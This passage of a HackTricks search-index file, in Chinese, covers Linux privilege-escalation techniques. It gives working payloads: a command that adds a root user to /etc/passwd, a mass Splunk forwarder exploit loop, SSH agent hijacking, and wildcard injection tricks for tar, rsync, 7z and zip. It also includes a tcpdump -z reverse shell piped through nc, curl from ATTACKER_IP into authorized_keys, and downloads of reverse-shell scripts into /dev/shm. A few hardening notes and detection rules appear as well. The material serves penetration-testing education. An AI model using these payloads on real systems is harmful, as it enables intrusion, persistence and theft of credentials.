hacker:$((mkpasswd -m SHA-512 myhackerpass || openssl passwd -1 -salt mysalt myhackerpass || echo \'$1$mysalt$7DTZJIc9s6z60L6aj0Sui.\') 2>/dev/null):0:0::/:/bin/bash >> /etc/passwd tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Payloads to execute » 将新根用户添加到 /etc/passwd","id":"1896","title":"将新根用户添加到 /etc/passwd"},"1897":{"body":"Reading time: 3 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » RunC Privilege Escalation » RunC 提权","id":"1897","title":"RunC 提权"},"1898":{"body":"如果你想了解更多关于 runc 的信息,请查看以下页面: 2375, 2376 Pentesting Docker","breadcrumbs":"Linux Privilege Escalation » RunC Privilege Escalation » 基本信息","id":"1898","title":"基本信息"},"1899":{"body":"如果你发现 runc 已安装在主机上,你可能能够 运行一个挂载主机根 / 文件夹的容器 。 bash runc -help #Get help and see if runc is intalled\\nrunc spec #This will create the config.json file in your current folder Inside the \\"mounts\\" section of the create config.json add the following lines:\\n{\\n\\"type\\": \\"bind\\",\\n\\"source\\": \\"/\\",\\n\\"destination\\": \\"/\\",\\n\\"options\\": [\\n\\"rbind\\",\\n\\"rw\\",\\n\\"rprivate\\"\\n]\\n}, #Once you have modified the config.json file, create the folder rootfs in the same directory\\nmkdir rootfs # Finally, start the container\\n# The root folder is the one from the host\\nrunc run demo caution 这并不总是有效,因为 runc 的默认操作是以 root 身份运行,因此以非特权用户身份运行它根本无法工作(除非您有无根配置)。将无根配置设为默认通常不是一个好主意,因为在无根容器内部有相当多的限制,而这些限制在无根容器外部并不适用。 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » RunC Privilege Escalation » PE","id":"1899","title":"PE"},"19":{"body":"tip 非常感谢这些资源,我该如何感谢你们? 您可以在推特上公开感谢 HackTricks 团队将所有这些资源整理成公开内容,提及 @hacktricks_live 。 如果您特别感激,您也可以 在这里赞助该项目 。 并且不要忘记 在 Github 项目中给个星星! (在下面找到链接)。 tip 我该如何为该项目做贡献? 您可以 与社区分享新的技巧和窍门或修复您在书中发现的错误 ,通过向相应的 Github 页面发送 Pull Request : https://github.com/carlospolop/hacktricks https://github.com/carlospolop/hacktricks-cloud 不要忘记 在 Github 项目中给个星星! tip 我可以复制一些 HackTricks 的内容并放到我的博客吗? 可以,但 不要忘记提及具体的链接 ,内容是从哪里获取的。 tip 我该如何引用 HackTricks 的页面? 只要您引用的页面的 链接 出现即可。 如果您需要 bibtex,您可以使用类似的格式: latex @misc{hacktricks-bibtexing,\\nauthor = {\\"HackTricks Team\\" or the Authors name of the specific page/trick},\\ntitle = {Title of the Specific Page},\\nyear = {Year of Last Update (check it at the end of the page)},\\nurl = {\\\\url{https://book.hacktricks.wiki/specific-page}},\\n} warning 我可以在我的博客中复制所有HackTricks吗? 我不建议这样做 。这 对任何人都没有好处 ,因为所有 内容已经在官方HackTricks书籍中免费公开 。 如果你担心它会消失,只需在Github上分叉或下载,如我所说,它已经是免费的。 warning 你们为什么有赞助商?HackTricks书籍是商业用途吗? 第一个 HackTricks 价值 是为 全世界 提供 免费的 黑客教育资源。HackTricks团队已经 投入了数千小时 来提供这些内容,再次强调,都是 免费的 。 如果你认为HackTricks书籍是为了 商业目的 而制作的,你是 完全错误的 。 我们有赞助商,因为即使所有内容都是免费的,我们也希望 给社区提供欣赏我们工作的可能性 ,如果他们愿意。因此,我们提供人们通过 Github赞助商 向HackTricks捐款的选项,以及 相关的网络安全公司 赞助HackTricks并在书中 放置一些广告 ,这些 广告 总是放在不会干扰学习过程的地方,以便让人们在专注于内容时仍能看到。 你不会发现HackTricks充满了烦人的广告,就像其他内容远不如HackTricks的博客,因为HackTricks不是为了商业目的而制作的。 caution 如果某个HackTricks页面基于我的博客文章但没有引用,我该怎么办? 我们非常抱歉。这不应该发生 。请通过Github问题、Twitter、Discord等告知我们HackTricks页面的链接和你的博客链接, 我们会尽快检查并添加引用 。 caution 如果HackTricks中有我博客的内容而我不希望它在那里,我该怎么办? 请注意,在HackTricks中链接到你的页面: 改善你的 SEO 内容被 翻译成超过15种语言 ,使更多人能够访问这些内容 HackTricks鼓励 人们 查看你的页面 (有几个人提到,自从他们的某个页面出现在HackTricks中,他们的访问量增加了) 然而,如果你仍然希望从HackTricks中删除你博客的内容,请告知我们,我们将 删除所有指向你博客的链接 ,以及任何基于该内容的内容。 caution 如果我在HackTricks中发现抄袭的内容,我该怎么办? 我们始终 给予原作者所有的信用 。如果你发现某个页面有抄袭的内容而没有引用原始来源,请告知我们,我们将 删除它 、 在文本前添加链接 ,或 重写并添加链接 。","breadcrumbs":"HackTricks Values & FAQ » HackTricks 常见问题","id":"19","title":"HackTricks 常见问题"},"190":{"body":"tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 mDNS 协议旨在在小型本地网络中进行 IP 地址解析,而无需专用名称服务器。它通过在子网内进行多播查询,促使指定名称的主机以其 IP 地址进行响应。子网中的所有设备可以使用此信息更新其 mDNS 缓存。 需要注意的关键点: 域名放弃 :主机可以通过发送 TTL 为零的数据包来释放其域名。 使用限制 :mDNS 通常仅解析以 .local 结尾的名称。在此域中与非 mDNS 主机的冲突需要网络配置调整。 网络详细信息 : 以太网多播 MAC 地址:IPv4 - 01:00:5E:00:00:FB,IPv6 - 33:33:00:00:00:FB。 IP 地址:IPv4 - 224.0.0.251,IPv6 - ff02::fb。 通过 UDP 端口 5353 操作。 mDNS 查询仅限于本地网络,不跨越路由器。","breadcrumbs":"Pentesting Network » Network Protocols Explained (ESP) » 多播 DNS (mDNS)","id":"190","title":"多播 DNS (mDNS)"},"1900":{"body":"tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 来自redhat文档的介绍和示例 SELinux 是一个 标签 系统 。每个 进程 和每个 文件 系统对象都有一个 标签 。SELinux 策略定义了关于 进程标签可以对系统上所有其他标签执行的操作 的规则。 容器引擎以单个受限的 SELinux 标签启动 容器进程 ,通常为 container_t,然后将容器内部的容器设置为标签 container_file_t。SELinux 策略规则基本上表示 container_t 进程只能读取/写入/执行标记为 container_file_t 的文件 。如果容器进程逃离容器并尝试写入主机上的内容,Linux 内核将拒绝访问,并仅允许容器进程写入标记为 container_file_t 的内容。 shell $ podman run -d fedora sleep 100\\nd4194babf6b877c7100e79de92cd6717166f7302113018686cea650ea40bd7cb\\n$ podman top -l label\\nLABEL\\nsystem_u:system_r:container_t:s0:c647,c780","breadcrumbs":"Linux Privilege Escalation » SELinux » 容器中的SELinux","id":"1900","title":"容器中的SELinux"},"1901":{"body":"除了常规的 Linux 用户,还有 SELinux 用户。SELinux 用户是 SELinux 策略的一部分。每个 Linux 用户都映射到一个 SELinux 用户,作为策略的一部分。这允许 Linux 用户继承施加在 SELinux 用户上的限制和安全规则与机制。 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » SELinux » SELinux 用户","id":"1901","title":"SELinux 用户"},"1902":{"body":"tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 在以下示例中, 创建了一个 unix socket (/tmp/socket_test.s),并且所有 接收到的内容 都将由 os.system 执行 。我知道你在现实中不会找到这个,但这个示例的目的是看看使用 unix sockets 的代码是怎样的,以及如何在最糟糕的情况下管理输入。 s.py import socket\\nimport os, os.path\\nimport time\\nfrom collections import deque if os.path.exists(\\"/tmp/socket_test.s\\"):\\nos.remove(\\"/tmp/socket_test.s\\") server = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)\\nserver.bind(\\"/tmp/socket_test.s\\")\\nos.system(\\"chmod o+w /tmp/socket_test.s\\")\\nwhile True:\\nserver.listen(1)\\nconn, addr = server.accept()\\ndatagram = conn.recv(1024)\\nif datagram:\\nprint(datagram)\\nos.system(datagram)\\nconn.close() 执行 代码使用python: python s.py 并 检查socket的监听状态 : python netstat -a -p --unix | grep \\"socket_test\\"\\n(Not all processes could be identified, non-owned process info\\nwill not be shown, you would have to be root to see it all.)\\nunix 2 [ ACC ] STREAM LISTENING 901181 132748/python /tmp/socket_test.s 利用 python echo \\"cp /bin/bash /tmp/bash; chmod +s /tmp/bash; chmod +x /tmp/bash;\\" | socat - UNIX-CLIENT:/tmp/socket_test.s tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Socket Command Injection » 使用 Python 的 Socket 绑定示例","id":"1902","title":"使用 Python 的 Socket 绑定示例"},"1903":{"body":"Reading time: 5 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 如果在 内部 或 外部 枚举一台机器时发现 Splunk正在运行 (端口8090),如果你幸运地知道任何 有效凭据 ,你可以 利用Splunk服务 以运行Splunk的用户身份 执行一个shell 。如果是root在运行它,你可以提升权限到root。 此外,如果你 已经是root并且Splunk服务不仅在localhost上监听 ,你可以 窃取 Splunk服务的 密码 文件并 破解 密码,或者 添加新的 凭据。并在主机上保持持久性。 在下面的第一张图片中,你可以看到Splunkd网页的样子。","breadcrumbs":"Linux Privilege Escalation » Splunk LPE and Persistence » Splunk LPE 和持久性","id":"1903","title":"Splunk LPE 和持久性"},"1904":{"body":"有关更多详细信息,请查看帖子 https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/ 。这只是一个总结: 漏洞概述: 针对Splunk Universal Forwarder Agent (UF) 的漏洞允许拥有代理密码的攻击者在运行该代理的系统上执行任意代码,可能会危及整个网络。 关键点: UF代理不验证传入连接或代码的真实性,使其容易受到未经授权的代码执行攻击。 常见的密码获取方法包括在网络目录、文件共享或内部文档中查找。 成功利用可能导致在受损主机上获得SYSTEM或root级别的访问权限、数据外泄和进一步的网络渗透。 漏洞执行: 攻击者获取UF代理密码。 利用Splunk API向代理发送命令或脚本。 可能的操作包括文件提取、用户账户操作和系统妥协。 影响: 在每个主机上完全网络妥协,具有SYSTEM/root级别的权限。 可能禁用日志记录以逃避检测。 安装后门或勒索软件。 利用示例命令: bash for i in `cat ip.txt`; do python PySplunkWhisperer2_remote.py --host $i --port 8089 --username admin --password \\"12345678\\" --payload \\"echo \'attacker007:x:1003:1003::/home/:/bin/bash\' >> /etc/passwd\\" --lhost 192.168.42.51;done 可用的公共漏洞: https://github.com/cnotin/SplunkWhisperer2/tree/master/PySplunkWhisperer2 https://www.exploit-db.com/exploits/46238 https://www.exploit-db.com/exploits/46487","breadcrumbs":"Linux Privilege Escalation » Splunk LPE and Persistence » Splunk Universal Forwarder Agent 漏洞总结","id":"1904","title":"Splunk Universal Forwarder Agent 漏洞总结"},"1905":{"body":"有关更多详细信息,请查看帖子 https://blog.hrncirik.net/cve-2023-46214-analysis tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Splunk LPE and Persistence » 滥用 Splunk 查询","id":"1905","title":"滥用 Splunk 查询"},"1906":{"body":"Reading time: 2 minutes 如果您在 /etc/ssh_config 或 $HOME/.ssh/config 配置中发现以下内容,您可以做些什么: ForwardAgent yes 如果你在机器内是 root,你可能可以 访问任何由你在 /tmp 目录中找到的代理所建立的 ssh 连接 。 使用 Bob 的 ssh-agent 冒充 Bob: bash SSH_AUTH_SOCK=/tmp/ssh-haqzR16816/agent.16816 ssh bob@boston","breadcrumbs":"Linux Privilege Escalation » SSH Forward Agent exploitation » 摘要","id":"1906","title":"摘要"},"1907":{"body":"当你设置变量 SSH_AUTH_SOCK 时,你正在访问 Bob 在其 ssh 连接中使用的密钥。然后,如果他的私钥仍然存在(通常是),你将能够使用它访问任何主机。 由于私钥以未加密的形式保存在代理的内存中,我想如果你是 Bob,但不知道私钥的密码,你仍然可以访问代理并使用它。 另一种选择是,代理的用户所有者和 root 可能能够访问代理的内存并提取私钥。","breadcrumbs":"Linux Privilege Escalation » SSH Forward Agent exploitation » 为什么这有效?","id":"1907","title":"为什么这有效?"},"1908":{"body":"查看 原始研究 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » SSH Forward Agent exploitation » 长篇解释和利用","id":"1908","title":"长篇解释和利用"},"1909":{"body":"Reading time: 11 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 通配符(又称 glob ) 参数注入 发生在特权脚本运行 Unix 二进制文件,如 tar、chown、rsync、zip、7z 等,使用未加引号的通配符,如 *。 由于 shell 在执行二进制文件之前会扩展通配符,因此能够在工作目录中创建文件的攻击者可以构造以 - 开头的文件名,使其被解释为 选项而不是数据 ,有效地走私任意标志或甚至命令。 本页面收集了 2023-2025 年最有用的原语、最新研究和现代检测。","breadcrumbs":"Linux Privilege Escalation » Wildcards Spare tricks » Wildcards Spare Tricks","id":"1909","title":"Wildcards Spare Tricks"},"191":{"body":"DNS-SD 是一种通过查询特定域名(例如,_printers._tcp.local)在网络上发现服务的协议。响应包括所有相关域,例如可用的打印机。在 这里 可以找到服务类型的完整列表。","breadcrumbs":"Pentesting Network » Network Protocols Explained (ESP) » DNS-SD (服务发现)","id":"191","title":"DNS-SD (服务发现)"},"1910":{"body":"您可以通过滥用 --reference 标志来 复制任意文件的所有者/组或权限位 : bash # attacker-controlled directory\\ntouch \\"--reference=/root/secret``file\\" # ← filename becomes an argument 当 root 后来执行类似的操作时: bash chown -R alice:alice *.php\\nchmod -R 644 *.php --reference=/root/secret``file 被注入,导致 所有 匹配的文件继承 /root/secret``file 的所有权/权限。 PoC & tool : wildpwn (组合攻击)。 另请参阅经典的 DefenseCode 论文以获取详细信息。","breadcrumbs":"Linux Privilege Escalation » Wildcards Spare tricks » chown / chmod","id":"1910","title":"chown / chmod"},"1911":{"body":"","breadcrumbs":"Linux Privilege Escalation » Wildcards Spare tricks » tar","id":"1911","title":"tar"},"1912":{"body":"通过滥用 checkpoint 功能执行任意命令: bash # attacker-controlled directory\\necho \'echo pwned > /tmp/pwn\' > shell.sh\\nchmod +x shell.sh\\ntouch \\"--checkpoint=1\\"\\ntouch \\"--checkpoint-action=exec=sh shell.sh\\" 一旦 root 运行 e.g. tar -czf /root/backup.tgz *,shell.sh 作为 root 被执行。","breadcrumbs":"Linux Privilege Escalation » Wildcards Spare tricks » GNU tar (Linux, *BSD, busybox-full)","id":"1912","title":"GNU tar (Linux, *BSD, busybox-full)"},"1913":{"body":"最近的 macOS 上默认的 tar(基于 libarchive) 不 实现 --checkpoint,但你仍然可以通过 --use-compress-program 标志实现代码执行,该标志允许你指定一个外部压缩程序。 bash # macOS example\\ntouch \\"--use-compress-program=/bin/sh\\" 当特权脚本运行 tar -cf backup.tar * 时,将启动 /bin/sh。","breadcrumbs":"Linux Privilege Escalation » Wildcards Spare tricks » bsdtar / macOS 14+","id":"1913","title":"bsdtar / macOS 14+"},"1914":{"body":"rsync 允许您通过以 -e 或 --rsync-path 开头的命令行标志覆盖远程 shell 或甚至远程二进制文件: bash # attacker-controlled directory\\ntouch \\"-e sh shell.sh\\" # -e => use instead of ssh 如果 root 后来使用 rsync -az * backup:/srv/ 归档目录,注入的标志会在远程端生成你的 shell。 PoC : wildpwn (rsync 模式)。","breadcrumbs":"Linux Privilege Escalation » Wildcards Spare tricks » rsync","id":"1914","title":"rsync"},"1915":{"body":"即使特权脚本 防御性 地用 -- 前缀添加通配符(以停止选项解析),7-Zip 格式通过用 @ 前缀文件名支持 文件列表文件 。将其与符号链接结合可以让你 外泄任意文件 : bash # directory writable by low-priv user\\ncd /path/controlled\\nln -s /etc/shadow root.txt # file we want to read\\ntouch @root.txt # tells 7z to use root.txt as file list 如果root执行类似于: bash 7za a /backup/`date +%F`.7z -t7z -snl -- * 7-Zip 将尝试将 root.txt (→ /etc/shadow) 作为文件列表读取,并将退出, 将内容打印到 stderr 。","breadcrumbs":"Linux Privilege Escalation » Wildcards Spare tricks » 7-Zip / 7z / 7za","id":"1915","title":"7-Zip / 7z / 7za"},"1916":{"body":"zip 支持标志 --unzip-command,该标志在测试归档时会 逐字 传递给系统 shell: bash zip result.zip files -T --unzip-command \\"sh -c id\\" 通过精心制作的文件名注入标志,并等待特权备份脚本在生成的文件上调用 zip -T(测试归档)。","breadcrumbs":"Linux Privilege Escalation » Wildcards Spare tricks » zip","id":"1916","title":"zip"},"1917":{"body":"以下命令在现代 CTF 和真实环境中被滥用。有效载荷始终作为一个 文件名 创建在一个可写目录中,稍后将通过通配符处理: 二进制文件 滥用的标志 效果 bsdtar --newer-mtime=@ → 任意 @file 读取文件内容 flock -c 执行命令 git -c core.sshCommand= 通过 SSH 执行 git 命令 scp -S 生成任意程序而不是 ssh 这些原语不如 tar/rsync/zip 经典常见,但在狩猎时值得检查。","breadcrumbs":"Linux Privilege Escalation » Wildcards Spare tricks » 额外的易受通配符注入影响的二进制文件(2023-2025 快速列表)","id":"1917","title":"额外的易受通配符注入影响的二进制文件(2023-2025 快速列表)"},"1918":{"body":"当受限的 shell 或供应商包装器通过连接用户控制的字段(例如,“文件名”参数)构建 tcpdump 命令行时,如果没有严格的引用/验证,您可以偷偷注入额外的 tcpdump 标志。-G(基于时间的轮换)、-W(限制文件数量)和 -z (后轮换命令)的组合会导致以运行 tcpdump 的用户身份(通常是设备上的 root)执行任意命令。 前提条件: 您可以影响传递给 tcpdump 的 argv(例如,通过像 /debug/tcpdump --filter=... --file-name= 的包装器)。 包装器不清理文件名字段中的空格或以 - 开头的标记。 经典 PoC(从可写路径执行反向 shell 脚本): sh # Reverse shell payload saved on the device (e.g., USB, tmpfs)\\ncat > /mnt/disk1_1/rce.sh <<\'EOF\'\\n#!/bin/sh\\nrm -f /tmp/f; mknod /tmp/f p; cat /tmp/f|/bin/sh -i 2>&1|nc 192.0.2.10 4444 >/tmp/f\\nEOF\\nchmod +x /mnt/disk1_1/rce.sh # Inject additional tcpdump flags via the unsafe \\"file name\\" field\\n/debug/tcpdump --filter=\\"udp port 1234\\" \\\\\\n--file-name=\\"test -i any -W 1 -G 1 -z /mnt/disk1_1/rce.sh\\" # On the attacker host\\nnc -6 -lvnp 4444 &\\n# Then send any packet that matches the BPF to force a rotation\\nprintf x | nc -u -6 [victim_ipv6] 1234 细节: -G 1 -W 1 强制在第一个匹配的数据包后立即旋转。 -z 在每次旋转后运行后旋转命令。许多构建执行 。如果 是脚本/解释器,请确保参数处理与您的有效负载匹配。 不可移动媒体变体: 如果您有其他原始方法来写入文件(例如,允许输出重定向的单独命令包装器),将您的脚本放入已知路径并触发 -z /bin/sh /path/script.sh 或 -z /path/script.sh,具体取决于平台语义。 一些供应商包装器旋转到攻击者可控的位置。如果您可以影响旋转路径(符号链接/目录遍历),您可以引导 -z 执行您完全控制的内容,而无需外部媒体。 供应商的加固建议: 切勿直接将用户控制的字符串传递给 tcpdump(或任何工具),而不使用严格的允许列表。引用并验证。 不要在包装器中暴露 -z 功能;使用固定的安全模板运行 tcpdump,并完全禁止额外标志。 降低 tcpdump 权限(仅限 cap_net_admin/cap_net_raw)或在具有 AppArmor/SELinux 限制的专用非特权用户下运行。","breadcrumbs":"Linux Privilege Escalation » Wildcards Spare tricks » tcpdump 轮换钩子 (-G/-W/-z):通过 argv 注入在包装器中实现 RCE","id":"1918","title":"tcpdump 轮换钩子 (-G/-W/-z):通过 argv 注入在包装器中实现 RCE"},"1919":{"body":"在关键脚本中禁用 shell 通配符 :set -f (set -o noglob) 防止通配符扩展。 引用或转义 参数:tar -czf \\"$dst\\" -- * 是 不安全的 — 更倾向于使用 find . -type f -print0 | xargs -0 tar -czf \\"$dst\\"。 显式路径 :使用 /var/www/html/*.log 而不是 *,以便攻击者无法创建以 - 开头的兄弟文件。 最小权限 :尽可能以非特权服务帐户而不是 root 运行备份/维护作业。 监控 :Elastic 的预构建规则 通过通配符注入的潜在 Shell 查找 tar --checkpoint=*、rsync -e* 或 zip --unzip-command 后面紧跟着一个 shell 子进程。EQL 查询可以适应其他 EDR。","breadcrumbs":"Linux Privilege Escalation » Wildcards Spare tricks » 检测与加固","id":"1919","title":"检测与加固"},"192":{"body":"SSDP 促进网络服务的发现,主要由 UPnP 使用。它是一种基于文本的协议,使用 UDP 通过端口 1900 进行多播寻址。对于 IPv4,指定的多播地址是 239.255.255.250。SSDP 的基础是 HTTPU ,这是 HTTP 的一个 UDP 扩展。","breadcrumbs":"Pentesting Network » Network Protocols Explained (ESP) » SSDP (简单服务发现协议)","id":"192","title":"SSDP (简单服务发现协议)"},"1920":{"body":"Elastic Security – 检测到的通过通配符注入的潜在 Shell 规则(最后更新于 2025 年) Rutger Flohil – “macOS — Tar 通配符注入”(2024 年 12 月 18 日) GTFOBins – tcpdump FiberGateway GR241AG – 完整利用链 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Wildcards Spare tricks » 参考文献","id":"1920","title":"参考文献"},"1921":{"body":"Reading time: 12 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Useful Linux Commands » 有用的 Linux 命令","id":"1921","title":"有用的 Linux 命令"},"1922":{"body":"bash #Exfiltration using Base64\\nbase64 -w 0 file #Get HexDump without new lines\\nxxd -p boot12.bin | tr -d \'\\\\n\' #Add public key to authorized keys\\ncurl https://ATTACKER_IP/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys #Echo without new line and Hex\\necho -n -e #Count\\nwc -l #Lines\\nwc -c #Chars #Sort\\nsort -nr #Sort by number and then reverse\\ncat file | sort | uniq #Sort and delete duplicates #Replace in file\\nsed -i \'s/OLD/NEW/g\' path/file #Replace string inside a file #Download in RAM\\nwget 10.10.14.14:8000/tcp_pty_backconnect.py -O /dev/shm/.rev.py\\nwget 10.10.14.14:8000/tcp_pty_backconnect.py -P /dev/shm\\ncurl 10.10.14.14:8000/shell.py -o /dev/shm/shell.py #Files used by network processes\\nlsof #Open files belonging to any process\\nlsof -p 3 #Open files used by the process\\nlsof -i #Files used by networks processes\\nlsof -i 4 #Files used by network IPv4 processes\\nlsof -i 6 #Files used by network IPv6 processes\\nlsof -i 4 -a -p 1234 #List all open IPV4 network files in use by the process 1234\\nlsof +D /lib #Processes using files inside the indicated dir\\nlsof -i :80 #Files uses by networks processes\\nfuser -nv tcp 80 #Decompress\\ntar -xvzf /path/to/yourfile.tgz\\ntar -xvjf /path/to/yourfile.tbz\\nbzip2 -d /path/to/yourfile.bz2\\ntar jxf file.tar.bz2\\ngunzip /path/to/yourfile.gz\\nunzip file.zip\\n7z -x file.7z\\nsudo apt-get install xz-utils; unxz file.xz #Add new user\\nuseradd -p \'openssl passwd -1 \' hacker #Clipboard\\nxclip -sel c < cat file.txt #HTTP servers\\npython -m SimpleHTTPServer 80\\npython3 -m http.server\\nruby -rwebrick -e \\"WEBrick::HTTPServer.new(:Port => 80, :DocumentRoot => Dir.pwd).start\\"\\nphp -S $ip:80 #Curl\\n#json data\\ncurl --header \\"Content-Type: application/json\\" --request POST --data \'{\\"password\\":\\"password\\", \\"username\\":\\"admin\\"}\' http://host:3000/endpoint\\n#Auth via JWT\\ncurl -X GET -H \'Authorization: Bearer \' http://host:3000/endpoint #Send Email\\nsendEmail -t to@email.com -f from@email.com -s 192.168.8.131 -u Subject -a file.pdf #You will be prompted for the content #DD copy hex bin file without first X (28) bytes\\ndd if=file.bin bs=28 skip=1 of=blob #Mount .vhd files (virtual hard drive)\\nsudo apt-get install libguestfs-tools\\nguestmount --add NAME.vhd --inspector --ro /mnt/vhd #For read-only, create first /mnt/vhd # ssh-keyscan, help to find if 2 ssh ports are from the same host comparing keys\\nssh-keyscan 10.10.10.101 # Openssl\\nopenssl s_client -connect 10.10.10.127:443 #Get the certificate from a server\\nopenssl x509 -in ca.cert.pem -text #Read certificate\\nopenssl genrsa -out newuser.key 2048 #Create new RSA2048 key\\nopenssl req -new -key newuser.key -out newuser.csr #Generate certificate from a private key. Recommended to set the \\"Organizatoin 